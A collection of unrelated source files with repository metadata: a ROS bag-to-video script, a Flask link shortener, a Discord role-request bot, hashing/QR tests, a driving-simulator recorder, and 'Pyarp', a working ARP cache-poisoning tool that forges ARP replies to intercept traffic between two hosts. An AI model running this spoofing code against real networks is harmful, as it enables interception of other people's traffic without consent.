opts, opt_files = getopt.getopt(sys.argv[1:],"hsr:o:c:t:",["fps=","rate=","ofile=","codec=","topic="])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt == '-s':
opt_display_images = True
elif opt in ("-r", "--fps"):
opt_fps = float(arg)
elif opt in ("--rate"):
opt_rate = float(arg)
elif opt in ("-o", "--ofile"):
opt_out_file = arg
elif opt in ("-c", "--codec"):
opt_fourcc = arg
elif opt in ("-t", "--topic"):
opt_topic = arg
else:
print "opz:", opt,'arg:', arg
def filter_image_msgs(topic, datatype, md5sum, msg_def, header):
if(datatype=="sensor_msgs/CompressedImage"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print "############# USING ######################"
print topic,' with datatype:', str(datatype)
return True;
if(datatype=="theora_image_transport/Packet"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print topic,' with datatype:', str(datatype)
# print "############# USING ######################"
print '!!! theora not supported, sorry !!!'
return False;
if(datatype=="sensor_msgs/Image"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print "############# USING ######################"
print topic,' with datatype:', str(datatype)
return True;
return False;
t_first={};
t_file={};
t_video={}
cv_image = []
np_arr = []
if (opt_fps<=0):
opt_fps = 1
if (opt_rate<=0):
opt_rate = 1
print "using ",opt_fps," FPS"
p_avconv = {}
bridge = CvBridge()
for files in range(0,len(opt_files)):
#First arg is the bag to look at
bagfile = opt_files[files]
#Go through the bag file
bag = rosbag.Bag(bagfile)
for topic, msg, t in bag.read_messages(connection_filter=filter_image_msgs):
# print topic, 'at', str(t)#,'msg=', str(msg)
try:
if msg.format.find("jpeg")!=-1 :
if msg.format.find("8")!=-1 and (msg.format.find("rgb")!=-1 or msg.format.find("bgr")!=-1):
if opt_display_images:
np_arr = np.fromstring(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_COLOR)
elif msg.format.find("mono8")!=-1 :
if opt_display_images:
np_arr = np.fromstring(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_COLOR)
else:
print 'unsupported format:', msg.format
exit(1)
if len(msg.data)>0:
if not topic in t_first :
t_first[topic] = t;
t_video[topic] = 0;
t_file[topic] = 0
t_file[topic] = (t-t_first[topic]).to_sec()
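# Repeat the current frame until the video timeline catches up with the bag timeline, keeping a fixed output frame rate.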
while t_video[topic]<t_file[topic]/opt_rate:
if not topic in p_avconv:
if opt_out_file=="":
out_file = str(topic).replace("/", "")+".mp4"
else:
out_file = opt_out_file
p_avconv[topic] = subprocess.Popen(['avconv','-r',str(opt_fps),'-an','-c','mjpeg','-f','mjpeg','-i','-',out_file],stdin=subprocess.PIPE)
p_avconv[topic].stdin.write(msg.data)
t_video[topic] += 1.0/opt_fps
if opt_display_images:
cv2.imshow(topic, cv_image)
key=cv2.waitKey(1)
if key==1048603:
exit(1);
except AttributeError:
try:
pix_fmt=""
if msg.encoding.find("mono8")!=-1 :
pix_fmt = "gray"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
elif msg.encoding.find("bgr8")!=-1 :
pix_fmt = "bgr24"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
elif msg.encoding.find("rgb8")!=-1 :
pix_fmt = "rgb24"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
else:
print 'unsupported encoding:', msg.encoding
exit(1)
if len(msg.data)>0:
if not topic in t_first :
t_first[topic] = t;
t_video[topic] = 0;
t_file[topic] = 0
t_file[topic] = (t-t_first[topic]).to_sec()
while t_video[topic]<t_file[topic]/opt_rate:
if not topic in p_avconv:
if opt_out_file=="":
out_file = str(topic).replace("/", "")+".mp4"
else:
out_file = opt_out_file
size = str(msg.width)+"x"+str(msg.height)
p_avconv[topic] = subprocess.Popen(['avconv','-r',str(opt_fps),'-an','-f','rawvideo','-s',size,'-pix_fmt', pix_fmt,'-i','-',out_file],stdin=subprocess.PIPE)
p_avconv[topic].stdin.write(msg.data)
t_video[topic] += 1.0/opt_fps
if opt_display_images:
cv2.imshow(topic, cv_image)
key=cv2.waitKey(1)
if key==1048603:
exit(1);
except AttributeError:
# maybe theora packet
# theora not supported
pass
bag.close();
``` |
{
"source": "7biok/flask-shortlink",
"score": 3
} |
#### File: 7biok/flask-shortlink/app.py
```python
from flask import Flask, render_template, request, redirect, url_for, Request
import shelve
from random import choice
from string import ascii_lowercase
import datetime
from flask_wtf import FlaskForm
from wtforms import SubmitField, StringField
from wtforms.validators import Length, URL
from os import urandom
app = Flask(__name__, template_folder="templates", static_folder="static")
URL_SHELVE_PATH = 'urls.shelve'
ANALYTICS_SHELVE_PATH = 'analytics.shelve'
DEBUG = True
app.config['SECRET_KEY'] = urandom(32)
BASE_URL = "https://7biok.online"
class ShortlinkForm(FlaskForm):
url = StringField('URL', validators=[
URL(require_tld=True, message='Invalid URL'),
Length(max=1000, message='Maximum URL length exceeded!')])
submit = SubmitField('Shorten!')
@app.route('/', methods=["GET", "POST"])
def root():
form = ShortlinkForm()
shortlink_url = None
if request.method == "POST" and form.validate_on_submit():
url = form.url.data
_debug(url)
id = _create_shortlink(url)
shortlink_url = BASE_URL + url_for('get_url', id=id)
form.url.data = ''
return render_template("index.html", form=form, url=shortlink_url)
@app.route('/<id>')
def get_url(id: str):
url = _lookup_url(id)
if url is None:
return redirect(url_for('root'))
_updateData(request, id)
return redirect(url)
@app.route('/analytics/<id>')
def analytics(id):
data = _prepareData(id)
return render_template("analytics.html", total_visits=len(_loadData(id)), timeseries_data=data)
@app.route('/delete/<id>')
def delete(id):
with shelve.open(URL_SHELVE_PATH, 'c') as shelf:
del shelf[id]
return analytics_index()
@app.route('/analytics')
def analytics_index():
linklist = _loadShortlinks()
return render_template('analytics_index.html', linklist=linklist)
def _create_shortlink(url: str) -> str:
id = _make_id(url)
with shelve.open(URL_SHELVE_PATH, 'c') as shelf:
shelf[id] = url
with shelve.open(ANALYTICS_SHELVE_PATH, 'c') as shelf:
shelf[id] = []
return id
def _make_id(url: str, id_len: int = 3) -> str:
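# Note: the id is a random 3-letter string; the url argument is currently unused and a colliding id would overwrite an existing link.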
return ''.join(choice(ascii_lowercase) for n in range(id_len))
def _lookup_url(id: str) -> str:
with shelve.open(URL_SHELVE_PATH, 'r') as shelf:
try:
return shelf[id]
except Exception as e:
_debug(str(e))
return None
def _updateData(request: Request, id: str):
request_ip = request.remote_addr
user_agent = request.user_agent.platform
with shelve.open(ANALYTICS_SHELVE_PATH, 'c') as shelf:
data = shelf[id]
data.append({
'timestamp': datetime.datetime.now(),
'ip': request_ip,
'user_agent': user_agent
})
shelf[id] = data
def _loadData(id: str):
with shelve.open(ANALYTICS_SHELVE_PATH, 'r') as shelf:
return shelf[id]
def _prepareData(id: str):
# Format [yy-mm-dd, hits]
# Format [Android_Hits, ect]
data = _loadData(id)
result = []
for date in sorted(set([x['timestamp'].date() for x in data])):
datestring = (str(date.year) + "-" + str(date.month) + "-" + str(date.day))
visits = len([x['ip'] for x in data if x['timestamp'].date() == date])
result.append((datestring, visits))
return result
def _loadShortlinks():
res = []
with shelve.open(URL_SHELVE_PATH, 'r') as shelf:
for key in shelf.keys():
res.append((str(BASE_URL + '/' + str(key)), shelf[key], (str(BASE_URL + '/analytics/' + str(key)))))
return res
def _debug(s):
if DEBUG:
print("Shortlink: " + s)
def main():
print(_prepareData("img"))
app.run('localhost')
if __name__ == '__main__':
main()
``` |
{
"source": "7BISSO/Pyarp",
"score": 2
} |
#### File: Pyarp/pyarp/__main__.py
```python
from __future__ import print_function
import logging
import os
import sys
import time
from pyarplib import *
from scapy.all import *
import subprocess
import netifaces
import cmd
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
if os.geteuid() != 0:
sys.exit("""Permission denied : Pyarp must be run as root.""")
subprocess.call(['sysctl', '-w', 'net.ipv4.ip_forward=1'])
subprocess.call(['clear'])
__global_iface__ = 'eth0'
print(pyarp_banner())
def arpreq(inet, iface, option):
if option == 'clean':
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=inet), timeout=2, iface=iface, verbose=False)
return ans
elif option == 'verbose':
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=inet), timeout=2, iface=iface)
return ans
def getmac(ip):
if regex(ip, 'ip'):
reply = arpreq(ip, __global_iface__, 'clean')
for snd, rcv in reply:
return (rcv[Ether].src)
else:
return "[!] Please use a valide ip address (IPv6 not supported)."
def connected(host):
exp = str(getmac(host))
if regex(exp, 'mac'):
return True
else:
return False
def get_urmac():
AF_LINK = netifaces.ifaddresses(__global_iface__)[netifaces.AF_LINK]
urmac = str(AF_LINK).split("'addr': '")[1].split("'}")[0]
return urmac
def forge(psrc, pdst, hwsrc, hwdst):
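# Build an ARP reply (op=2) with the given source/destination IP and MAC fields.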
arp_packet = ARP()
arp_packet.op = 2
arp_packet.psrc = psrc
arp_packet.pdst = pdst
arp_packet.hwsrc = hwsrc
arp_packet.hwdst = hwdst
return arp_packet
def recover(psrc, pdst, hwsrc, hwdst):
clean_packet = forge(psrc, pdst, hwsrc, hwdst)
send(clean_packet, verbose=False)
def syntax_err(cmd):
print("[!] Syntax Error : please type 'help " +
cmd + "' or 'man' for details.")
class Pyarp(cmd.Cmd):
prompt = '\033[1;94mpyarp>> \033[1;m'
__iface__ = netifaces.interfaces()
__AF__ = ['AF_INET', 'AF_LINK']
def do_iface(self, iface):
"""Usage : iface <interface name>"""
global __global_iface__
if iface in self.__iface__:
__global_iface__ = iface
elif iface:
print("[!] Unknown interface.")
else:
syntax_err('iface')
def complete_iface(self, text, line, begidx, endidx):
if not text:
completions = self.__iface__[:]
else:
completions = [
cmd for cmd in self.__iface__ if cmd.startswith(text)]
return completions
def do_inet(self, _AF):
"""Usage : inet [option], see 'man' for options"""
if _AF == 'AF_INET':
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__)[netifaces.AF_INET])
elif _AF == 'AF_LINK':
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__)[netifaces.AF_LINK])
elif _AF:
syntax_err('inet')
else:
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__))
def complete_inet(self, text, line, begidx, endidx):
if not text:
completions = self.__AF__[:]
else:
completions = [cmd for cmd in self.__AF__ if cmd.startswith(text)]
return completions
def do_getmac(self, ip):
"""Usage : getmac <host ip address>"""
if ip:
print(getmac(ip))
else:
syntax_err('getmac')
def do_scan(self, inet):
"""Usage : scan <network>, eg {scan 192.168.1.0/24}"""
if inet and regex(inet, 'net'):
reply = arpreq(inet, __global_iface__, 'verbose')
print("\ninet {}".format(inet) +
"\niface {}\n".format(__global_iface__))
scn = 1
for snd, rcv in reply:
print("\033[1;92mHost {}\033[1;m: ".format(scn) +
(rcv.sprintf(r"MAC %Ether.src% IP %ARP.psrc%")))
scn = scn + 1
else:
syntax_err('scan')
print("[*] make sure to give a valid network address !")
def do_spoof(self, line):
"""Usage : spoof <target> <target> """
if line and len(line.split()) == 2:
_host = line.split()
if regex(_host[0], 'ip') and regex(_host[1], 'ip'):
if connected(_host[0]) and connected(_host[1]):
urmac = get_urmac()
hwhost_a = getmac(_host[0])
hwhost_b = getmac(_host[1])
arp_packet_a = forge(_host[0], _host[1], urmac, hwhost_b)
arp_packet_b = forge(_host[1], _host[0], urmac, hwhost_a)
print("\033[1;92m\n[+] Attack Launched.\n\033[1;m")
while True:
try:
send(arp_packet_a)
send(arp_packet_b)
time.sleep(2)
except KeyboardInterrupt:
recover(_host[0], _host[1], hwhost_a,
"ff:ff:ff:ff:ff:ff")
recover(_host[1], _host[0], hwhost_b,
"ff:ff:ff:ff:ff:ff")
break
print(
"\033[1;92m\n[+] Attack stopped, successful recover.\n\033[1;m")
else:
print("[!] Host '" + _host[0] + "' or '" + _host[1] +
"' not connected, use 'scan' to scan your network.")
else:
print("[!] Please use a valide ip address (IPv6 not supported).")
else:
syntax_err('spoof')
def do_man(self, _):
print(pyarp_manual())
def do_license(self, _):
print(pyarp_license())
def do_clear(self, _):
_ = subprocess.call(['clear'])
def emptyline(self):
'clean line'
def do_exit(self, line):
'Close pyarp, press Ctrl+D for quick exit'
return True
def do_EOF(self, line):
print('\n')
return True
def main():
Pyarp().cmdloop()
``` |
{
"source": "7BitLogic/AKEA",
"score": 3
} |
#### File: AKEA/tests/test_dbakea.py
```python
import unittest
from akea import dbakea
import configparser
class DBAKEAtest(unittest.TestCase):
def testDBAKEA_hash_and_file_functions(self):
"""Test the DBAKEA hashing functions.
Test DBAKEA basic functions by creating and adding to dbakea base and
than check backwards by reading the qrakea file.
Args:
self: object
Returns:
None
"""
config = configparser.ConfigParser()
config.read('test_akea.conf')
dbakea.append_to_db('./akea_test_dummies/', config) #E:/Programmieren/AKEA/tests
dbakea_entry = dbakea.check_qr(config, './akea_test_dummies/test_dummie1.txt.qrakea')
self.assertEqual(dbakea_entry, './akea_test_dummies\\test_dummie1.txt')
if __name__ == "__main__":
unittest.main()
```
#### File: AKEA/tests/test_qrakea.py
```python
import unittest
import binascii
from akea import qrakea
from akea import akea
ref_hash_data = ('./akea_test_dummies/test_dummie1.txt', '_sha512-336x_', 'ae23766d87092cd29d648cd74c0db7f2259d7515b0633cc312b15a819eb396944a2c81fc8d9286ccae18')
class QRAKEAtest(unittest.TestCase):
def testQRAKEA_QR_gen_and_read_functions(self):
"""Test the QRAKEA QR functions.
Test all QRAKEA basic functions by generating a QR image and decode it again..
Args:
self: object
Returns:
None
"""
file_path = './akea_test_dummies/test_dummie1.txt'
data = akea.hex_digest(file_path)
self.assertEqual(data, ref_hash_data)
img = qrakea.generate_qr_code(data)
img.save(file_path+'.qrakea', format='PNG', dpi=(600, 600))
re_read_data = qrakea.get_qr_image(file_path+'.qrakea')
self.assertEqual(binascii.unhexlify(data[2]), re_read_data)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "7bitlyrus/rolerequest",
"score": 2
} |
#### File: rolerequest/modules/limited.py
```python
import datetime
import logging
import typing
import discord
from discord.ext import commands, tasks
import config
from consts import *
import utils
class LimitedRequests(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.db = bot.db
self.expiry_check.start()
self.expiry_check.clear_exception_types()
def cog_unload(self):
self.expiry_check.stop()
@tasks.loop(minutes=10, reconnect=False)
async def expiry_check(self):
logging.info('[Limited] Checking for expired requests...')
expire_before = (datetime.datetime.utcnow() - datetime.timedelta(hours=24)).timestamp() # 24 hours ago
for server in self.db:
for message_id, request in server['requests'].items():
if request['created'] > expire_before: continue
try:
guild = await self.bot.fetch_guild(server['id'])
except:
logging.info(f'[Limited] Unable to fetch guild for request {message_id}')
continue
await self.request_update(guild, message_id, request, 'expired')
logging.info(f'[Limited] Expired request {message_id}')
@expiry_check.before_loop
async def before_expiry_check(self):
await self.bot.wait_until_ready()
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
if not payload.member: return
if payload.member.bot: return
doc = utils.getGuildDoc(self.bot, payload.member.guild)
if not doc: return
request = doc['requests'][str(payload.message_id)]
if not request: return
if str(payload.emoji) == config.greenTick:
await self.request_update(payload.member.guild, payload.message_id, request, 'approved', payload.member)
elif str(payload.emoji) == config.redTick:
await self.request_update(payload.member.guild, payload.message_id, request, 'denied', payload.member)
return
# Called from join command in core.py
async def request_create(self, ctx, role):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
channel = doc['requests_opts']['channel']
users_requests = list(filter(lambda e: e['user'] == ctx.author.id, doc['requests'].values()))
if doc['requests_opts']['hidejoins']:
try:
await ctx.message.delete(delay=5)
except:
pass
delete = 15
else:
delete = None
if not channel:
return await utils.cmdFail(ctx, f'Limited role requests are currently disabled for this guild.',
delete_after = delete)
existing_request = list(filter(lambda e: e['role'] == role.id, users_requests))
if existing_request and existing_request[-1]['status'] == 'pending':
return await utils.cmdFail(ctx, f'You already have a request pending for the role "{role.name}".',
delete_after = delete)
# Ratelimit if enabled & ratelimit score above maximum; score calculated from status of requests in last 24h
if doc['requests_opts']['ratelimit']:
rl_score = 0
for r in users_requests:
rl_score += 0 if not r["status"] in LIMITED_RATELIMIT_SCORES else LIMITED_RATELIMIT_SCORES[r["status"]]
if rl_score > LIMITED_RATELIMIT_SCORE_MAX:
return await utils.cmdFail(ctx, 'You have too many recent requests. Please try again later.',
delete_after = delete)
embed = discord.Embed(
title='Limited Role Request',
description=f'<@{ctx.message.author.id}> requested the <@&{role.id}> role.',
color=discord.Colour.blurple(),
timestamp=datetime.datetime.utcnow() + datetime.timedelta(hours=24))
embed.set_author(name=f'{ctx.message.author} ({ctx.message.author.id})', icon_url=ctx.message.author.avatar_url)
embed.add_field(name='Status', value='Pending. React to approve or deny the request.')
embed.set_footer(text='Request expires')
embed_message = await ctx.guild.get_channel(channel).send(embed=embed)
await embed_message.add_reaction(config.greenTick)
await embed_message.add_reaction(config.redTick)
utils.guildKeySet(ctx.bot, ctx.guild, f'requests.{embed_message.id}', {
'channel': embed_message.channel.id,
'created': datetime.datetime.utcnow().timestamp(),
'role': role.id,
'status': 'pending',
'user': ctx.author.id,
})
return await utils.cmdSuccess(ctx, f'Your request for "{role.name}" has been submitted.', delete_after = delete)
# Called from leave command in core.py
async def request_cancel(self, ctx, role):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
requests = list(filter(
lambda e: e[1]['user'] == ctx.author.id and e[1]['role'] == role.id, doc['requests'].items()
))
request = requests[-1] if requests else (None, None)
if not request[1] or request[1]['status'] != 'pending':
return await utils.cmdFail(ctx, f'You do not have a request pending for the role "{role.name}".')
await self.request_update(ctx.guild, request[0], request[1], 'cancelled')
return await utils.cmdSuccess(ctx, f'Your request for "{role.name}" has been cancelled.')
async def request_update(self, guild, message_id, request, status, mod = None):
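# Apply the new status: grant the role on approval, update (or drop, when expired) the stored
# request, edit the original embed if it is still pending, and DM the requester unless cancelled.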
statuses = {
'cancelled': {
'colour': discord.Colour.darker_grey(),
'footer': 'Request cancelled',
'status': 'Cancelled by user.'
},
'approved': {
'colour': discord.Colour.dark_green(),
'dm': 'been approved.',
'footer': 'Request approved',
'status': f'Approved by {mod}.'
},
'denied': {
'colour': discord.Colour.dark_red(),
'dm': 'been denied.',
'footer': 'Request denied',
'status': f'Denied by {mod}.'
},
'expired': {
'colour': discord.Colour.greyple(),
'dm': 'expired due to lack of moderator response.',
'footer': 'Request expired',
'status': f'Request expired due to lack of moderator response.'
}
}
member = await guild.fetch_member(request['user'])
role = guild.get_role(request['role'])
layout = statuses[status]
if status == 'approved':
await member.add_roles(role, reason='User role request approved')
if status == 'expired':
utils.guildKeyDel(self.bot, guild, f'requests.{message_id}')
else:
utils.guildKeySet(self.bot, guild, f'requests.{message_id}.status', status)
if request['status'] == 'pending':
channel = await self.bot.fetch_channel(request['channel'])
try:
embed_message = await channel.fetch_message(message_id)
embed = embed_message.embeds[0]
embed.colour = layout['colour']
embed.timestamp = datetime.datetime.utcnow()
embed.set_footer(text=layout['footer'])
embed.remove_field(0)
embed.add_field(name='Status', value=layout['status'])
await embed_message.edit(embed=embed)
await embed_message.clear_reactions()
except:
pass
if status != 'cancelled':
try:
await member.send(f'Your request for "{role}" in "{guild}" has {layout["dm"]}')
except:
pass
return
@commands.group(name='limited', invoke_without_command=True, case_insensitive=True)
@commands.has_guild_permissions(manage_guild=True)
@commands.guild_only()
@utils.guild_in_db()
async def _limited(self, ctx):
'''
Manages settings for limited role requests
'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
channel = doc['requests_opts']['channel']
hidejoins = doc['requests_opts']['hidejoins']
ratelimit = doc['requests_opts']['ratelimit']
embed = discord.Embed(title=f'Limited Role Request Options for: {ctx.guild}')
embed.set_footer(text=f'Use the "{ctx.prefix}help limited" command for help on changing these settings.')
if channel == None:
embed.description = 'Requests are currently disabled for this guild.'
return await ctx.send(embed=embed)
embed.add_field(name='Posting Channel', value=f'<#{channel}>')
embed.add_field(name='Join Command Hiding', value='Enabled' if hidejoins else 'Disabled')
embed.add_field(name='Join Command Ratelimiting', value='Enabled' if ratelimit else 'Disabled')
return await ctx.send(embed=embed)
@_limited.command(name='disable')
@utils.guild_in_db()
async def _limited_disable(self, ctx):
'''Disables limited role requests for the guild'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
if doc['requests_opts']['channel'] == None:
return await utils.cmdFail(ctx, f'Requests are already disabled for this guild.')
utils.guildKeySet(ctx.bot, ctx.guild, 'requests_opts.channel', None)
return await utils.cmdSuccess(ctx, f'Requests are now disabled for this guild.')
@_limited.command(name='channel')
@utils.guild_in_db()
async def _limited_channel(self, ctx, channel: discord.TextChannel):
'''Sets the channel that limited role requests will be posted in'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
if doc['requests_opts']['channel'] == channel.id:
return await utils.cmdFail(ctx, f'The requests channel is already {channel}.')
utils.guildKeySet(ctx.bot, ctx.guild, 'requests_opts.channel', channel.id)
return await utils.cmdSuccess(ctx, f'The requests channel is now {channel}.')
@_limited.command(name='hidejoins', aliases=['hidejoin'])
@utils.guild_in_db()
async def _limited_hidejoins(self, ctx, setting: typing.Optional[bool]):
'''Sets automatic deletion of join commands for limited roles'''
return await self._limited_option_toggle(ctx, setting, 'hidejoins', 'hiding')
@_limited.command(name='ratelimit', aliases=['ratelimiting', 'ratelimited'])
@utils.guild_in_db()
async def _limited_ratelimited(self, ctx, setting: typing.Optional[bool]):
'''Sets ratelimiting of join commands for limited roles'''
return await self._limited_option_toggle(ctx, setting, 'ratelimit', 'ratelimiting')
# Generic togglable option prototype for hidejoins and ratelimit
async def _limited_option_toggle(self, ctx, user_setting, setting_key, setting_string):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
current = doc['requests_opts'][setting_key]
if user_setting is None:
user_setting = not current
human = 'enabled' if user_setting else 'disabled'
if user_setting == current:
return await utils.cmdFail(ctx, f'Limited role join command {setting_string} is already **{human}**.')
utils.guildKeySet(ctx.bot, ctx.guild, f'requests_opts.{setting_key}', user_setting)
return await utils.cmdSuccess(ctx, f'Limited role join command {setting_string} is now **{human}**.')
def setup(bot):
bot.add_cog(LimitedRequests(bot))
logging.info('[Extension] Limited module loaded')
def teardown(bot):
bot.remove_cog('LimitedRequests')
logging.info('[Extension] Limited module unloaded')
``` |
{
"source": "7bits/augbuilder",
"score": 3
} |
#### File: augbuilder/augbuilder/augmentation.py
```python
import albumentations
import streamlit as st
from elements import (
checkbox,
element_description,
min_max,
num_interval,
radio,
rgb,
several_nums,
text_input,
)
def select_next_aug(augmentations):
"""
Returns the list of transformations selected by the user.
Parameters:
augmentations: dict with all available transformation from json file
Returns:
list of selected transformations (excluding the trailing 'None')
"""
oneof_list = [['OneOf'], ['StopOneOf']]
oneof = ['OneOf', 'StopOneOf']
default_selection = list(augmentations.keys())
selection = ['None'] + oneof_list[0] + default_selection
selected_aug = [
st.sidebar.selectbox('select transformation 1: ', selection),
]
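# Keep asking for the next transformation until 'None' is picked. Choosing 'OneOf' swaps that
# menu entry for 'StopOneOf' (and back) so a OneOf block can be opened and closed, and
# already-picked transforms are removed from the menu.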
while (selected_aug[-1] != 'None'):
transformation_number = len(selected_aug) + 1
select_string = 'select transformation {0}: '.format(
transformation_number,
)
current_aug = selected_aug[-1]
if current_aug == oneof[0]:
oneof_ind = selection.index(oneof[0])
selection[oneof_ind] = oneof[1]
elif current_aug == oneof[1]:
stoponeof_ind = selection.index(oneof[1])
selection[stoponeof_ind] = oneof[0]
if selected_aug and current_aug not in oneof:
selection.remove(current_aug)
selected_aug.append(st.sidebar.selectbox(select_string, selection))
return selected_aug[:-1]
def apply_changes(augment_dict, apply_compose=True):
"""
Composes selected transformation.
Parameters:
augment_dict: dict with selected transformations
apply_compose: if True, returns ready to apply transformation
Returns:
transform: returns all selected transformations with params,\
if apply_compose - returns ready to apply transformation
"""
all_keys = list(augment_dict.keys())
if all_keys:
transform = []
for i in all_keys:
current_dict = augment_dict[i]
if current_dict is not None:
transform = add_transformation(transform, i, **current_dict)
else:
transform = add_transformation(transform, i)
if apply_compose:
transform = albumentations.Compose(transform)
return transform
def add_transformation(final_transform, curr_transf, **current_dict):
"""
Adds last transformation to existing ones.
Parameters:
final_transform: all transformation with params
curr_transf: selected transformation
**current_dict: params for current transformation
Returns:
final_transform: all transformation with params
"""
transform = getattr(albumentations, curr_transf)
if (current_dict is not None):
if curr_transf == 'OneOf':
apply_replay = False
current_dict = apply_changes(current_dict, apply_replay)
final_transform.append(transform(current_dict))
else:
final_transform.append(transform(**current_dict))
else:
final_transform.append(transform())
return final_transform
def setup_current_choice(current_choice, augmentations, session_state):
"""
Displays the settings widgets for the current transformation's parameters and returns their values.
Parameters:
current_choice: selected current transformation as a string
augmentations: dict with all available transformation from json file
session_state: current session information
Returns:
current_params: dict with settings for transformation and its values
"""
elements_type = {
'num_interval': num_interval,
'radio': radio,
'rgb': rgb,
'min_max': min_max,
'checkbox': checkbox,
'several_nums': several_nums,
'text_input': text_input,
}
current_params = {}
if augmentations[current_choice]:
desc = element_description(current_choice)
if not desc:
desc = ''
st.sidebar.subheader('params for {0}\n{1}'.format(
current_choice,
desc,
))
for params in augmentations[current_choice]:
if isinstance(params['param_name'], list):
res = elements_type[params['type']](
current_choice,
session_state,
**params,
)
for i, subparams in enumerate(params['param_name']):
current_params.update({subparams: res[i]})
else:
res = elements_type[params['type']](
current_choice,
session_state,
**params,
)
current_params.update({params['param_name']: res})
return current_params
def dict_update(
aug,
current_choice,
augmentations,
session_state,
):
"""
Returns settings for current transformation.
Parameters:
aug: settings for current_choice
current_choice: selected current transformation as a string
augmentations: dict with all available transformation from json file
session_state: current session information
Returns:
settings for the current transformation
"""
if aug:
return setup_current_choice(
current_choice,
augmentations,
session_state,
)
``` |
{
"source": "7-B/learning-to-drive-in-5-minutes",
"score": 3
} |
#### File: learning-to-drive-in-5-minutes/teleop/recorder.py
```python
import os
import cv2
class Recorder(object):
"""
Class to record images for offline VAE training
:param env: (Gym env)
:param folder: (str)
:param start_recording: (bool)
:param verbose: (int)
"""
def __init__(self, env, folder='logs/recorded_data/', start_recording=False, verbose=0):
super(Recorder, self).__init__()
self.env = env
self.is_recording = start_recording
self.folder = folder
self.current_idx = 0
self.verbose = verbose
self.observation_space = env.observation_space
self.action_space = env.action_space
# Create folder if needed
os.makedirs(folder, exist_ok=True)
images_idx = [int(im.split('.jpg')[0]) for im in os.listdir(folder) if im.endswith('.jpg')]
if len(images_idx) > 0:
self.current_idx = max(images_idx)
if verbose >= 1:
print("Recorder current idx: {}".format(self.current_idx))
def reset(self):
obs = self.env.reset()
if self.is_recording:
self.save_image()
return obs
def render(self, mode='rgb_array'):
return self.env.render(mode=mode)
def seed(self, seed=None):
return self.env.seed(seed)
def step(self, action):
obs, reward, done, info = self.env.step(action)
if self.is_recording:
self.save_image()
return obs, reward, done, info
def save_image(self):
image = self.env.render(mode='rgb_array')
# Convert RGB to BGR
# image = image[:, :, ::-1]
cv2.imwrite("{}/{}.jpg".format(self.folder, self.current_idx), image)
if self.verbose >= 2:
print("Saving", "{}/{}.jpg".format(self.folder, self.current_idx))
self.current_idx += 1
def set_recording_status(self, is_recording):
self.is_recording = is_recording
if self.verbose >= 1:
print("Setting recording to {}".format(is_recording))
def toggle_recording(self):
self.set_recording_status(not self.is_recording)
def exit_scene(self):
self.env.exit_scene()
```
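A minimal usage sketch for the `Recorder` wrapper above (hedged: `DummyDrivingEnv` and the folder path are illustrative placeholders, not part of the repository). Any Gym-style object exposing `reset`, `step`, and `render(mode='rgb_array')` can be wrapped; one JPEG is written per step while recording is enabled:
```python
import numpy as np

from teleop.recorder import Recorder  # the module shown above


class DummyDrivingEnv:
    """Stand-in env: returns blank 80x160 RGB frames."""
    observation_space = None
    action_space = None

    def reset(self):
        return np.zeros((80, 160, 3), dtype=np.uint8)

    def step(self, action):
        return np.zeros((80, 160, 3), dtype=np.uint8), 0.0, False, {}

    def render(self, mode='rgb_array'):
        return np.zeros((80, 160, 3), dtype=np.uint8)


recorder = Recorder(DummyDrivingEnv(), folder='logs/demo_run/', start_recording=True, verbose=1)
obs = recorder.reset()                               # writes logs/demo_run/0.jpg
obs, reward, done, info = recorder.step([0.0, 0.1])  # writes logs/demo_run/1.jpg
```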
#### File: learning-to-drive-in-5-minutes/teleop/teleop_client.py
```python
import argparse
import os
import time
import cv2
from threading import Event, Thread
import numpy as np
import pygame
from pygame.locals import *
from stable_baselines.bench import Monitor
from stable_baselines.common.vec_env import VecFrameStack, VecNormalize, DummyVecEnv
from config import MIN_STEERING, MAX_STEERING, MIN_THROTTLE, MAX_THROTTLE, \
LEVEL, N_COMMAND_HISTORY, TEST_FRAME_SKIP, ENV_ID, FRAME_SKIP, \
SHOW_IMAGES_TELEOP, REWARD_CRASH, CRASH_SPEED_WEIGHT
from donkey_gym.envs.vae_env import DonkeyVAEEnv
from utils.utils import ALGOS, get_latest_run_id, load_vae
from .recorder import Recorder
UP = (MAX_THROTTLE, 0)
LEFT = (0, 1)
RIGHT = (0, -1)
DOWN = (-MAX_THROTTLE * 1.0, 0)
STOP = (0, 0)
KEY_CODE_SPACE = 32
MAX_TURN = 1
# Smoothing constants
STEP_THROTTLE = 0.3
STEP_TURN = 0.4
TELEOP_RATE = 1 / 60 # 60 fps
GREEN = (72, 205, 40)
RED = (205, 39, 46)
GREY = (187, 179, 179)
BLACK = (36, 36, 36)
WHITE = (230, 230, 230)
ORANGE = (200, 110, 0)
